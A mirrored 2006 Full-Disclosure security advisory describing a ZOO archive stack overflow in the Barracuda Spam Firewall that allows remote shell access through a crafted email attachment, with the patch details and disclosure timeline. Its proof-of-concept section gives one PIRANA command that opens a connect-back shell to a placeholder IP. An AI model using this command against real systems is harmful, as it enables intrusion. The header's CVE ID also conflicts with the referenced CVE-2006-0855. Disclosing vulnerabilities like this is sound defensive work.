Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12077
HistoryApr 04, 2006 - 12:00 a.m.

[Full-disclosure] Barracuda ZOO archiver security bug leads to remote compromise

2006-04-0400:00:00
vulners.com
27
JSON

Topic: Barracuda ZOO archiver security bug leads to
remote compromise

Announced: 2006-04-03
Product: Barracuda Spam Firewall
Vendor: http://www.barracudanetworks.com/
Impact: Remote shell access
Affected product: Barracuda with firmware < 3.3.03.022 AND
spamdef < 3.0.9388
Credits: Jean-Sebastien Guay-Leroux
CVE ID: CVE-2004-0234

I. BACKGROUND

The Barracuda Spam Firewall is an integrated hardware and software solution for
complete protection of your email server. It provides a powerful, easy to use,
and affordable solution to eliminating spam and virus from your organization by
providing the following protection:

  • Anti-spam
  • Anti-virus
  • Anti-spoofing
  • Anti-phishing
  • Anti-spyware (Attachments)
  • Denial of Service

II. DESCRIPTION:

When building a special ZOO archive with long filenames in it, it is possible to
overflow a buffer on the stack used by the program and seize control of the
program.

Since this component is used when scanning an incoming email, remote compromise
is possible by sending a simple email with the specially crafted ZOO archive
attached to the Barracuda Spam Firewall.

You do NOT need to have remote administration access (on port 8000) for
successfull exploitation.

For further informations about the details of the bug, you can consult
OSVDB #23460 .

III. IMPACT

Gain shell access to the remote Barracuda Spam Firewall

IV. PROOF OF CONCEPT

Using the PIRANA framework, available at http://www.guay-leroux.com , it is
possible to test the Barracuda Spam Firewall against the ZOO vulnerability.

By calling PIRANA the way it is described below, you will get a TCP connect back
shell on IP address 1.2.3.4 and port 1234:

perl pirana.pl -e 4 -h barracuda.vulnerable.com -a postmaster -s 0 -l 1.2.3.4 \
-p 1234 -z -c 1 -d 1

V. SOLUTION

Barracuda Networks pushed an urgent critical patch in spamdef #3.0.9388,
available March 3rd 2006.

They also published an official patch in firmware #3.3.03.022, available April
3rd 2006.

It is recommended to update to firmware #3.3.03.022 .

VI. CREDITS

Jean-Sebastien Guay-Leroux who found the original flaw, conducted further
research on the bug and produced exploitation plugin for the PIRANA framework.

VII. REFERENCES

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0855

VIII. HISTORY

2006-03-02 : Disclosure of vulnerability to Barracuda Networks
2006-03-02 : Acknowledgement of the problem
2006-03-03 : Problem fixed
2006-04-03 : Advisory disclosed to public

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Related

checkpoint_advisories 1
securityvulns 4
cve 2
ubuntucve 2
nessus 10
debiancve 1
gentoo 2
freebsd 2
prion 1
openvas 8
osv 2
debian 3
slackware 1
seebug 1
redhat 1
exploitpack 1
altlinux 1
cert 1
exploitdb 1
suse 2
checkpoint_advisories
checkpoint_advisories
F-Secure Anti-Virus LHA Processing Buffer Overflow (CVE-2004-0234)
2009-12-22 00:00:00
securityvulns
securityvulns
[Full-disclosure] Barracuda LHA archiver security bug leads to remote compromise
2006-04-04 00:00:00
[Full-Disclosure] LHa buffer overflows and directory traversal problems
2004-05-02 00:00:00
[Full-Disclosure] [RHSA-2004:179-01] An updated LHA package fixes security vulnerabilities
2004-04-30 00:00:00
cve
cve
CVE-2004-0234
2004-08-18 04:00:00
CVE-2006-0855
2006-02-23 21:02:00
ubuntucve
ubuntucve
CVE-2004-0234
2004-08-18 00:00:00
CVE-2006-0855
2006-02-23 00:00:00
nessus
nessus
FreeBSD : zoo -- stack based buffer overflow (d9307a41-c4d7-11da-b2fb-000e0c2e438a)
2006-05-13 00:00:00
Debian DSA-991-1 : zoo - buffer overflow
2006-10-14 00:00:00
GLSA-200603-05 : zoo: Stack-based buffer overflow
2006-03-07 00:00:00
debiancve
debiancve
CVE-2006-0855
2006-02-23 21:02:00
gentoo
gentoo
zoo: Stack-based buffer overflow
2006-03-06 00:00:00
Multiple vulnerabilities in LHa
2004-05-09 00:00:00
freebsd
freebsd
zoo -- stack based buffer overflow
2006-02-22 00:00:00
lha buffer overflows and path traversal issues
2004-04-29 00:00:00
prion
prion
Stack overflow
2006-02-23 21:02:00
openvas
openvas
FreeBSD Ports: zoo
2008-09-04 00:00:00
Debian Security Advisory DSA 991-1 (zoo)
2008-01-17 00:00:00
Gentoo Security Advisory GLSA 200603-05 (zoo)
2008-09-24 00:00:00
osv
osv
zoo - buffer overflow
2006-03-10 00:00:00
lha - several vulnerabilities
2004-06-05 00:00:00
debian
debian
[SECURITY] [DSA 991-1] New zoo packages fix arbitrary code execution
2006-03-10 10:23:00
[SECURITY] [DSA 991-1] New zoo packages fix arbitrary code execution
2006-03-10 10:23:00
[SECURITY] [DSA 515-1] New lha packages fix several vulnerabilities
2004-06-05 20:39:22
slackware
slackware
lha update in bin package
2004-05-04 16:34:52
seebug
seebug
LHA 1.x - Buffer Overflow/Directory Traversal Vulnerabilities
2014-07-01 00:00:00
redhat
redhat
(RHSA-2004:178) lha security update
2004-05-26 00:00:00
exploitpack
exploitpack
LHA 1.x - Remote Buffer Overflow Directory Traversal
2004-04-30 00:00:00
altlinux
altlinux
Security fix for the ALT Linux 6 package lha version 2:1.14i-alt1
2004-05-08 00:00:00
cert
cert
Lhaca buffer overflow vulnerability
2007-07-06 00:00:00
exploitdb
exploitdb
LHA 1.x - Remote Buffer Overflow / Directory Traversal
2004-04-30 00:00:00
suse
suse
remote root access in Live CD 9.1
2004-05-06 20:51:52
privilege escalation, local DoS in Linux Kernel
2004-05-04 00:48:08
JSON
Related for SECURITYVULNS:DOC:12077
checkpoint_advisories1securityvulns4cve2ubuntucve2nessus10debiancve1gentoo2freebsd2prion1openvas8osv2debian3slackware1seebug1redhat1exploitpack1altlinux1cert1exploitdb1suse2